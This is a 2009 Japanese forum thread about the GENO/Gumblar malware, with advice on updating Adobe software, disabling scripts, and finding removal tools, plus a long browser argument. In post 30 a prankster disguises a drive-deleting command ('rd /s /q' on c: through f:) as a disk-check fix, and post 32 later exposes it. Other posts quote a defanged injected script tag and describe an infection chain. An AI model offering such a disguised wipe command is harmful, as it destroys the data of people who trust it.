GENOウイルススレ ★23

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
■ Windows Update / Microsoft Updateを更新
 XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新(使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 Adobe Readerを開いて ヘルプ→アップデートの有無をチェック
■ Adobe Flash Playerを更新(動画サイト見てるなら絶対入ってる。IE版、非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp

以上でGumblar.x / Daonolは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す

■ブラウザでスクリプト使用を基本無効に設定
・Firefox NoScriptを導入する。
・Google Chrome -disable-javascriptで起動。
・Opera ツール→設定→詳細設定タブ→「JavaScriptを有効にする」のチェックを外す。
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。

優先度低
■ Vistaの人ははUACをONにする
■ Adobe Shockwave Player (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Version 6 Update (Javascriptとは違うので注意)
ttp://www.java.com/ja/

前スレ
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
2名無しさん@お腹いっぱい。:2009/12/01(火) 04:02:55

■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください

@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
ttp://www.nifty.com/security/vcheck/index.htm

■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1

■ 旧型GENOウイルスのまとめなど
*** 【注意!】10月からの亜種には無効な情報があります ***
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/


【関連スレ】
GENOウイルススレ 感染4台目 - インターネット板
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
3名無しさん@お腹いっぱい。:2009/12/01(火) 04:06:02
★過去スレ
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ ★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415022/
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
GENOウイルススレ ★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/
GENOウイルススレ ★8
http://pc11.2ch.net/test/read.cgi/sec/1242476260/
GENOウイルススレ ★9
http://pc11.2ch.net/test/read.cgi/sec/1242489450/
GENOウイルススレ ★10
http://pc11.2ch.net/test/read.cgi/sec/1242504332/
GENOウイルススレ ★11
http://pc11.2ch.net/test/read.cgi/sec/1242538005/
4名無しさん@お腹いっぱい。:2009/12/01(火) 04:11:44
★過去スレ
GENOウイルススレ ★12
http://pc11.2ch.net/test/read.cgi/sec/1242557561/
GENOウイルススレ ★13
http://pc11.2ch.net/test/read.cgi/sec/1242576033/
GENOウイルススレ ★14
http://pc11.2ch.net/test/read.cgi/sec/1242611652/
GENOウイルススレ ★15
http://pc11.2ch.net/test/read.cgi/sec/1242627614/
GENOウイルススレ ★16
http://pc11.2ch.net/test/read.cgi/sec/1242636332/
GENOウイルススレ ★17
http://pc11.2ch.net/test/read.cgi/sec/1242650756/
GENOウイルススレ ★18
http://pc11.2ch.net/test/read.cgi/sec/1242666396/
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★19
http://pc11.2ch.net/test/read.cgi/sec/1242755190/
GENOウイルススレ ★20
http://pc11.2ch.net/test/read.cgi/sec/1243016705/
GENOウイルススレ ★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
5名無しさん@お腹いっぱい。:2009/12/01(火) 07:30:19
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
http://www.forest.impress.co.jp/docs/review/20091020_323014.html
http://hide9999.web.fc2.com/
6名無しさん@お腹いっぱい。:2009/12/01(火) 08:01:54
アプリケーションの脆弱性確認ツール

MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/

Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
7名無しさん@お腹いっぱい。:2009/12/01(火) 13:26:03
いちもつ

しかしだな、前スレ(22)以前の物はいらないと思う。
8名無しさん@お腹いっぱい。:2009/12/01(火) 14:01:30
個人情報をさらすマルウェア、Shareを通じて日本で流通
http://headlines.yahoo.co.jp/hl?a=20091130-00000006-zdn_ep-sci

これってエロゲーにsetup.exeを仕込まれてた例のアレ?
晒し会場(現在は404)
ttp://p3p.jp/top

winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1233404027
9名無しさん@お腹いっぱい。:2009/12/01(火) 19:05:54
スレ違いっつーか板違い
ダウソ板でやれ
10名無しさん@お腹いっぱい。:2009/12/02(水) 15:52:57
■ 感染確認・駆除ツール等
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
11名無しさん@お腹いっぱい。:2009/12/03(木) 16:43:07
【誤検出?】avast!報告スレ【Win32:Delf-MZG】
http://pc11.2ch.net/test/read.cgi/sec/1259820451/

これもGENO系なの?
12名無しさん@お腹いっぱい。:2009/12/03(木) 16:44:59
それはただの誤検出
13名無しさん@お腹いっぱい。:2009/12/03(木) 18:03:32
まだまだ猛威を振るってますね。。
http://www.virustotal.com/jp/analisis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1259829527

対応済み:AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応:Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他
14名無しさん@お腹いっぱい。:2009/12/03(木) 18:08:06
Shareの奴だろ。関係ないからダウソ板に帰れって。
15名無しさん@お腹いっぱい。:2009/12/03(木) 18:14:05
>>14
これGumblar.x 系らしいよ。
16名無しさん@お腹いっぱい。:2009/12/03(木) 18:22:29
デタラメもいい加減にしろよ。
> Symantec 1.4.4.12 2009.12.03 Infostealer.Kenzero

Illegal Games? Pay the Price?Publicly!
ttp://www.symantec.com/connect/blogs/illegal-games-pay-price-publicly
Infostealer.Kenzero primarily arrives in the guise of setup.exe,
which in this case is a fake installation file for Japanese pornographic games
that are circulating around the file-sharing network “Share.”
Several pornographic games have been reported to include this malicious setup.exe file.
17名無しさん@お腹いっぱい。:2009/12/03(木) 19:11:20
       ____
     /      \
   /  _ノ  ヽ、_  \
  / o゚((●)) ((●))゚o \  ほんとはShareでエロゲを違法ダウンロードしたんだお…
  |     (__人__)'    |
  \     `⌒´     /

       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \  でも恥ずかしくて言えないお…
  |     (__人__)    |
  \     ` ⌒´     /

       ____
     /⌒  ⌒\
   /( ●)  (●)\
  /::::::⌒(__人__)⌒::::: \   だからGENOのせいにするお!
  |     |r┬-|     |
  \      `ー'´     /
18名無しさん@お腹いっぱい。:2009/12/05(土) 02:03:17
Win7でも感染報告があったらしいけど、それでもVistaだけは安全なの?
19名無しさん@お腹いっぱい。:2009/12/05(土) 02:06:59
知らないけど報告は間違ってる場合もあるからな
以前も感染するわけ無いのに報告あったから
20名無しさん@お腹いっぱい。:2009/12/05(土) 02:09:19
ちょっと知識がある人は感染しない
感染したと言ってる人は本当かどうかは別として知識がない
だから報告も信憑性がない
21名無しさん@お腹いっぱい。:2009/12/05(土) 07:21:36
とりあえず前スレ埋めてこようぜ
22名無しさん@お腹いっぱい。:2009/12/05(土) 12:11:38
AdobeがFlash Playerのアップデートを予告、Illustratorには脆弱性発覚
http://tsushima.2ch.net/test/read.cgi/news/1259935979/
23名無しさん@お腹いっぱい。:2009/12/05(土) 12:47:38
Vistaや7で感染したって人はUAC切ってたんだろ
24名無しさん@お腹いっぱい。:2009/12/05(土) 13:26:35
以前のGENOはバージョンチェックしてたからUACは関係ない
それでも感染したとか言う人がいた
25名無しさん@お腹いっぱい。:2009/12/05(土) 16:03:40
ttp://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20091202102123.html
先月4位から1位に浮上したのは、感染コンピュータのユーザ情報や
FTPサーバへのログイン名とパスワードを盗み出そうとする「TSPY_KATES(カテス)」です。
「TSPY_KATES」は、「JS_GUMBLER(ガンブラー)」や「JS_IFRAME(アイフレーム)」によって
改ざんされた正規のWebサイトから、リダイレクトされる不正なWebサイトより感染することが確認されています。

ttp://www.viruslist.com/en/weblog?weblogid=208187923
ttp://www.viruslist.com/en/images/pictures/vlweblog/208187928.jpg
感染 日本7位
リダイレクタ 日本6位
26名無しさん@お腹いっぱい。:2009/12/05(土) 20:06:53
さすがエロサイト動画サイト大好き日本人
27名無しさん@お腹いっぱい。:2009/12/06(日) 01:24:11
gred AntiVirus アクセラレータ
http://pc11.2ch.net/test/read.cgi/sec/1259237196/
28名無しさん@お腹いっぱい。:2009/12/06(日) 10:42:39
「2009.11.06 日曜日」
ttp://www3.atword.jp/gnome/2009/12/06/dec-06-2009-sun/
gnomeさん・・・時計が1ヶ月ずr(ry
29名無しさん@お腹いっぱい。:2009/12/06(日) 14:22:19
画面が真っ黒になるわけじゃないけどポインタだけになって何もできない
もちろんセーフモードでも起動できない
でも5回くらいやってるとまた何事もなかったかのように起動する
30名無しさん@お腹いっぱい。:2009/12/06(日) 15:33:50
>>29
ウイルス感染?それともハード関連の不具合かな?
OS他PCスペック等が判らないからなんとも言えないが、
簡易検出の「チェックディスクコマンド」を試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
31名無しさん@お腹いっぱい。:2009/12/06(日) 17:56:49
ありがとう。すっぱり綺麗になった。
32名無しさん@お腹いっぱい。:2009/12/06(日) 23:12:01
誰もひっかからないとは思うが一応書いとく
>30を実行するとフォルダが全部削除されるから気をつけろ
とりあえず通報しといた
33名無しさん@お腹いっぱい。:2009/12/07(月) 01:36:36
>>32
アドバイスありがとう。
だが大丈夫だ。今時のゆとりは(俺含め)、
こんなコマンドなんざ面倒くさがっていちいち打ったりしない。
34名無しさん@お腹いっぱい。:2009/12/07(月) 01:41:17
前スレ埋めてきた。 ついでに新型の情報を転載っと。

--

962 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43
Trojan-Downloader.JS.Gumblar.x 確認
www●jwell●com

963 :名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10
jsに突っ込まれてるね。
/js/font.js
/js/base.js
/inc/prog.js
35名無しさん@お腹いっぱい。:2009/12/08(火) 08:25:27
結局フラッシュだかadobe等更新しとけばいいだけ
36名無しさん@お腹いっぱい。:2009/12/08(火) 08:27:12
だか、等
とか言われるとスゲー不安
37名無しさん@お腹いっぱい。:2009/12/08(火) 08:33:43
日常使うソフトなんか限られるわけだから
全部最新版にしておけばいい
スクリプト防いだ!スゴイ!よりは効果があるわ
38名無しさん@お腹いっぱい。:2009/12/08(火) 08:35:59
日本語でおk
39名無しさん@お腹いっぱい。:2009/12/08(火) 08:38:34
こんなスレでまじになっちゃってどうするの
40名無しさん@お腹いっぱい。:2009/12/08(火) 08:40:03
IE使うなとか馬鹿か
MACウイルス無いとか威張ってるのと同じだな
41名無しさん@お腹いっぱい。:2009/12/08(火) 08:47:07
unDonutとTheworldとIE7を使い分けてるぜ
42名無しさん@お腹いっぱい。:2009/12/08(火) 09:26:47
Windows使わなければ何も怖いことはない。
43名無しさん@お腹いっぱい。:2009/12/08(火) 09:33:13
パソコン使わなければいいじゃん。
44名無しさん@お腹いっぱい。:2009/12/08(火) 10:28:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
45名無しさん@お腹いっぱい。:2009/12/08(火) 10:39:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
他人に強制するほどの根拠があるかね
Windows使うの辞めろよ
使い勝手はIEコンポブラウザならかわらんし
46名無しさん@お腹いっぱい。:2009/12/08(火) 10:42:38
ここまで全部俺
47名無しさん@お腹いっぱい。:2009/12/08(火) 10:46:48
Firefox使いだがNoScriptはいろいろな意味で嫌い。
48名無しさん@お腹いっぱい。:2009/12/08(火) 12:19:56
ここまでScript
49名無しさん@お腹いっぱい。:2009/12/08(火) 12:46:17
火狐野郎が
50名無しさん@お腹いっぱい。:2009/12/08(火) 12:50:17
こんにちはGoogleです
51名無しさん@お腹いっぱい。:2009/12/08(火) 12:51:55
Firefoxつかいが頭おかしい事がまたあかるみになったのか
52名無しさん@お腹いっぱい。:2009/12/08(火) 13:11:47
オープンソースがすごい?
リナックスでも使ってろ糞狐
53名無しさん@お腹いっぱい。:2009/12/08(火) 18:35:26
Windows使ってんだからIE使うのが普通だしな
54名無しさん@お腹いっぱい。:2009/12/08(火) 18:39:30
保守おつかれさまです
55名無しさん@お腹いっぱい。:2009/12/08(火) 18:41:08
なあに馬鹿なの
56名無しさん@お腹いっぱい。:2009/12/08(火) 18:42:50
何使おうが自由だ
押し付けがましいんだよ
Firefox厨
57名無しさん@お腹いっぱい。:2009/12/08(火) 18:44:49
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。

よく分からない奴がそんなモン使うわけねえだろきめえ
58名無しさん@お腹いっぱい。:2009/12/08(火) 18:45:37
この子なんでこんなに必死なの
59名無しさん@お腹いっぱい。:2009/12/08(火) 18:47:26
必死だなこんな糞スレで
60名無しさん@お腹いっぱい。:2009/12/08(火) 18:47:32
すごいね
一人で何回も書き込んじゃってw
61名無しさん@お腹いっぱい。:2009/12/08(火) 18:48:26
Firefox使えとかうぜえ
62名無しさん@お腹いっぱい。:2009/12/08(火) 18:49:16
俺の自演だけど毎回茶々いれてくる馬鹿暇人が混じるから迷惑だ
63名無しさん@お腹いっぱい。:2009/12/08(火) 18:51:19
どっかの誰かが作ってちょっと突っ込まれたらすぐいじるような糞アドオンつかうのなら
IEでスクリプト全オフでブラウジングしたほうがまし
64名無しさん@お腹いっぱい。:2009/12/08(火) 18:55:49
GENO対策なんか更新しとけばオワリ
スレ伸ばすにはにはNoScriptがいいとか書いてテンプレwいじれば
ブラウザ戦争が勃発
65名無しさん@お腹いっぱい。:2009/12/08(火) 19:07:27
FirefoxだけプラグインのNoscript使えとか書いて
他のやる気なさすげえ
66名無しさん@お腹いっぱい。:2009/12/08(火) 19:35:41
糞チェッカーは糞
67名無しさん@お腹いっぱい。:2009/12/09(水) 15:36:17
Flash Playerの最新バージョン公開、深刻な脆弱性を修正
ttp://internet.watch.impress.co.jp/docs/news/20091209_334535.html
68名無しさん@お腹いっぱい。:2009/12/09(水) 15:59:32
NoScriptなんかでいばるより更新しとけってこと
69名無しさん@お腹いっぱい。:2009/12/09(水) 16:31:01
10,0,32,18からかわんねえぞ
70名無しさん@お腹いっぱい。:2009/12/09(水) 18:17:03
一回アンインスコしないと
71名無しさん@お腹いっぱい。:2009/12/09(水) 18:19:42
firefox/opera版はプラグイン形式で簡単だからいいね
いつも、普通にコントロールパネルから通常アンインストール→最新版をインストールでやってる
IEはエンジン部分だけ2chブラウザで利用しているが完全放置
flashも入れていない
72名無しさん@お腹いっぱい。:2009/12/09(水) 18:29:46
しらねえよカス
73名無しさん@お腹いっぱい。:2009/12/09(水) 18:30:58
火狐野郎はなにかにつけてどうでもいいことにケチつけるな
74名無しさん@お腹いっぱい。:2009/12/09(水) 18:31:30
Adobe Flash Player のバージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
(各ブラウザで確認すること)

インスコ時のバージョン○○がインスコされましたってのは
Adobeの中の人の手打ちなので信用すんな
75名無しさん@お腹いっぱい。:2009/12/09(水) 18:33:08
アンインストールする必要ないな別に
76名無しさん@お腹いっぱい。:2009/12/09(水) 18:39:56
IEも他のも自動で変わるからアンインスコとかいらんね
77名無しさん@お腹いっぱい。:2009/12/09(水) 18:43:10
またIEアンチが頭おかしい理屈こねたのか
78名無しさん@お腹いっぱい。:2009/12/09(水) 18:44:19
このスレ☆10ぐらいから500レスは俺だな
79名無しさん@お腹いっぱい。:2009/12/09(水) 21:33:05
>>71
>>5
80名無しさん@お腹いっぱい。:2009/12/10(木) 12:27:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
81名無しさん@お腹いっぱい。:2009/12/10(木) 13:25:33
>>80
IE(笑)は、スクリプト以前にActiveXがうんこ
82名無しさん@お腹いっぱい。:2009/12/10(木) 13:29:39
Netscape(笑)Pluginほどでは(笑)
83名無しさん@お腹いっぱい。:2009/12/10(木) 13:34:56
糞火狐がまたGENOと関係ないこといってら
84名無しさん@お腹いっぱい。:2009/12/10(木) 13:36:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
85名無しさん@お腹いっぱい。:2009/12/10(木) 13:40:16
いまだActiveXが危険とかいってんのか
どんだけー
86名無しさん@お腹いっぱい。:2009/12/10(木) 13:42:10
自分で撃ってくれと弾が入った鉄砲を渡したあほ
鉄砲が危険だから死んだと遺族が訴えた
87名無しさん@お腹いっぱい。:2009/12/10(木) 13:47:15
オープンソースがすごい?
リナックスでも使ってろ
88名無しさん@お腹いっぱい。:2009/12/10(木) 13:48:29
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
89名無しさん@お腹いっぱい。:2009/12/10(木) 13:52:07
>>57
まったくその通りです。
むしろよくわからない人は「NoScript」を導入しないで下さいだと思う。
ここはブラウザの優劣を競うすれじゃないんだし、並列に扱えばいいじゃない。

■ブラウザでスクリプト使用を基本無効に設定
ここに>>84さんの言うIEの設定方法を書き加えて

これを削除する
↓↓↓
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の
用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
90名無しさん@お腹いっぱい。:2009/12/10(木) 13:54:03
■ブラウザでスクリプト使用を基本無効に設定
このくだりは全部いらねえよ
更新だけしとけばいい
91名無しさん@お腹いっぱい。:2009/12/10(木) 14:07:23
ツール(T) -> インターネットオプション(O) -> 「セキュリティ」タブ ->
「レベルのカスタマイズ」ボタン -> 「スクリプト」 の「アクティブスクリプト」で「無効にする」を選択。
でjavascript無効

セキュリティのインターネットのゾーンを基本全部無効にして
信頼済みサイトに追加していけばいいだろう
noscriptとか使うのと同じ感じになる
IEコンポ系ではワンタッチで有効無効を切り替えられるのもある

まあスクリプト使用!危険
そんなヒステリーにつきあってられるかってのが実際だ
92名無しさん@お腹いっぱい。:2009/12/10(木) 14:21:29
糞チェッカーはうんこ
93名無しさん@お腹いっぱい。:2009/12/10(木) 14:35:13
>89
荒らしに構うな
94名無しさん@お腹いっぱい。:2009/12/10(木) 14:36:22
>>信頼済みサイトに追加していけばいいだろう
これが大変なんだけどね…
95名無しさん@お腹いっぱい。:2009/12/10(木) 14:37:50
真するー出来ないやつがきたな
96名無しさん@お腹いっぱい。:2009/12/10(木) 14:41:12
すくりぷと使用しないとか強い意志があるならそれでいいだろ
NoScriptなら簡単に追加できる!!馬鹿かと
97名無しさん@お腹いっぱい。:2009/12/10(木) 14:48:00
>>1-96
ここまでNoScriptをスルーできない人でお送りしました。
98名無しさん@お腹いっぱい。:2009/12/10(木) 14:50:34
>>97
スルー
99名無しさん@お腹いっぱい。:2009/12/10(木) 14:51:49
89と97は俺じゃない
100名無しさん@お腹いっぱい。:2009/12/10(木) 15:18:48
むしろIE版noscriptつくれ
101名無しさん@お腹いっぱい。:2009/12/10(木) 17:38:23
http://www3.atword.jp/gnome/zlkon-gumblar-%e5%95%8f%e9%a1%8c%e3%81%ab%e9%96%a2%e3%81%97%e3%81%a6/
【Zlkon, Gumblar 問題に関して】
>Firefox+NoScriptの使用を検討してください。

g'nomeさんが推奨してるから良いんでね?

NoScriptの設定で<IFRAME>を禁止にしておけば、
IFRAMEインジェクションも阻止れるし。
IFRAME=うざい広告、アクセス解析、webビーーー〜・・・(ry
102名無しさん@お腹いっぱい。:2009/12/10(木) 18:56:28
g'nomeさんて誰だよ
そんなやつがどうだろうが知るかぼけが
103名無しさん@お腹いっぱい。:2009/12/10(木) 18:58:29
また火狐野朗が他の関係ないこといいだしたのか
104名無しさん@お腹いっぱい。:2009/12/10(木) 19:04:09
>>NoScriptの設定で<IFRAME>を禁止にしておけば…
NoScriptしかしらんのか
105名無しさん@お腹いっぱい。:2009/12/10(木) 19:06:55
何使おうが自由だ
押し付けがましいんだよ
Firefox厨
106名無しさん@お腹いっぱい。:2009/12/10(木) 19:13:01
IEでの対処方書いて
テンプレ新しく作れよ
107名無しさん@お腹いっぱい。:2009/12/10(木) 19:15:21
■ブラウザでスクリプト使用を基本無効に設定
の項目より下はいらん
108名無しさん@お腹いっぱい。:2009/12/10(木) 19:19:02
Windows以外のOSの使用を検討してください。
て書けよ
109名無しさん@お腹いっぱい。:2009/12/10(木) 19:23:14
>>102-107
一人で連投して必死だなw
おまい、MSの社員だろ?
110名無しさん@お腹いっぱい。:2009/12/10(木) 19:24:32
■ブラウザでスクリプト使用を基本無効に設定
InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  (ブラウザ再起動をしないと適用されない)
Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
 ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
  また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
  切り替え可能になるのでいざという時便利
111名無しさん@お腹いっぱい。:2009/12/10(木) 19:29:45
(ブラウザ再起動をしないと適用されない)なんてのは嘘だね
112名無しさん@お腹いっぱい。:2009/12/10(木) 19:31:42
■ブラウザでスクリプト使用を基本無効に設定
・InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
・Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
・safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
・Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
・Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
・Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
 ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
  また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
  切り替え可能になるのでいざという時便利
・Google Chrome -disable-javascriptで起動。
113名無しさん@お腹いっぱい。:2009/12/10(木) 19:33:21
MSの社員じゃないあんたはさっさとWindowsなんぞ使うのやめたら
はるかに安全で使いやすいらしいぞ
114名無しさん@お腹いっぱい。:2009/12/10(木) 19:48:47
Macとか
115名無しさん@お腹いっぱい。:2009/12/10(木) 19:51:15
WebBoyでも使ってろ
116名無しさん@お腹いっぱい。:2009/12/10(木) 20:25:07
g'nomeのとこ、ここではあんま話題にすんな。いろいろあったんだから・・・
自分が参考にする分にはご自由にどうぞ
117名無しさん@お腹いっぱい。:2009/12/10(木) 20:27:30
またそんな釣りレスして
118名無しさん@お腹いっぱい。:2009/12/10(木) 21:38:10
なんか面倒くせえな、もう携帯で見るわ
119名無しさん@お腹いっぱい。:2009/12/10(木) 23:11:12
そこまでしてNoScript否定したいのは何故だ?
アフィで稼いでいる奴が必死になってんのか?
120名無しさん@お腹いっぱい。:2009/12/10(木) 23:36:22
いつもの保守ツールくんだから気にしなくていいよ
121名無しさん@お腹いっぱい。:2009/12/10(木) 23:42:39
アフィやってるヤツならAdblock Plusが敵だろ
サードパーティのスクリプトやオブジェクト全部読み込まないとか出来るけど
NoScriptやRequestPolicyほど融通きかんがな
122名無しさん@お腹いっぱい。:2009/12/10(木) 23:44:11
今回FlashPlayer9の更新もあったのな
もう無いのかと思ってたぜ
123名無しさん@お腹いっぱい。:2009/12/11(金) 08:35:27
NoScript否定したい?
糞火狐が他否定してるんだろカスが
124名無しさん@お腹いっぱい。:2009/12/11(金) 08:46:52
必死こいてテンプレ変えた奴がよくいう
125名無しさん@お腹いっぱい。:2009/12/11(金) 09:07:43
fox房はよくおしつける
使いやすさは人それぞれだし
セキュリティなんぞ努力のおかげでシェアあがって危険ブラウザ
破綻まみれのセールストーク聞き飽きた
126名無しさん@お腹いっぱい。:2009/12/11(金) 09:08:46
話が長いな
その話はもういいよ
127名無しさん@お腹いっぱい。:2009/12/11(金) 09:11:56
はやく900までいかなあかんもんねえ(笑)
1が削除依頼出して建てなおすならともかく
128名無しさん@お腹いっぱい。:2009/12/11(金) 12:09:04
IE(核爆笑)
129名無しさん@お腹いっぱい。:2009/12/11(金) 12:15:34
また召還呪文唱えてるのか火狐
130名無しさん@お腹いっぱい。:2009/12/11(金) 12:16:34
Windows(核爆笑)
131名無しさん@お腹いっぱい。:2009/12/11(金) 17:39:09
Gumblarご乱心?
tp://www●malatyabirlikgazetesi●com/
<script src=http://orientdesigns●co●in/images/favicon●php ></script>

色々な場所に沢山入ってるんだが・・・
132名無しさん@お腹いっぱい。:2009/12/11(金) 17:48:07
なにそれこわい
133名無しさん@お腹いっぱい。:2009/12/11(金) 17:49:17
www●senbaskasin●net/ms_word●asp?haber=246

「ファイルタイプ: Microsoft Word」
こんなのも引っ掛かるようになってきた
134名無しさん@お腹いっぱい。:2009/12/11(金) 19:39:33
>>131
自動で突っ込むタイプだとよくある。
135名無しさん@お腹いっぱい。:2009/12/12(土) 02:50:48
旅行関係(代理店?)のHP陥落を複数確認。

webtravel●co●jp ※問い合わせページのみ?
http://www.google.com/safebrowsing/diagnostic?site=webtravel.co.jp/&hl=ja

usa-sports●net
http://www.google.com/safebrowsing/diagnostic?site=usa-sports.net/&hl=ja

某空港の巻き込みを喰らったと思われる。

※上記以外にもあるような気がするが、調べる時間が無〜 orz
136名無しさん@お腹いっぱい。:2009/12/13(日) 05:14:50
ビスタだけどジェノに感染したかも・・・
デスクトップ画面がブラックスクリーン(セーフモードでの起動は可能
これもうクリーンインストールしか手は無いの?
それ以外の回復手段あったら教えてくれ・・・
137名無しさん@お腹いっぱい。:2009/12/13(日) 05:26:05
>>136
クリーンインストール推奨だが・・・ >>10 でどう?
念のためすべてのツールを試してみるとか
138名無しさん@お腹いっぱい。:2009/12/13(日) 05:29:46
トロイの木馬『Buzus』、感染サイトは12万5000以上に

11月下旬に始まった極めて複雑な新型 SQL インジェクション攻撃により、
すでに12万5000以上の Web サイトが、クレジットカード情報や銀行口座などの
情報を収集することで知られるトロイの木馬『Buzus』に感染している。

インターネットのセキュリティおよび監視を手がける企業 ScanSafe によると、
この攻撃はまず、埋め込まれた iframe が「318x.com」というサイトから
第1段階の悪質なコードを読み込むのだという。
その後、ユーザーからは見えない一連の iframe およびコードリダイレクションが、
「windowssp.7766.org」サイトから問題のあるコード「Backdoor.Win32.Buzus.croo」を
密かにインストールして完了する。

http://japan.internet.com/webtech/20091211/12.html
139名無しさん@お腹いっぱい。:2009/12/13(日) 06:50:40
>>136 vistaで何やって感染したんだ?
140名無しさん@お腹いっぱい。:2009/12/13(日) 07:30:31
tp://www.forest.impress.co.jp/lib/inet/security/antiadspy/secuniapsi.html
141名無しさん@お腹いっぱい。:2009/12/13(日) 12:42:12
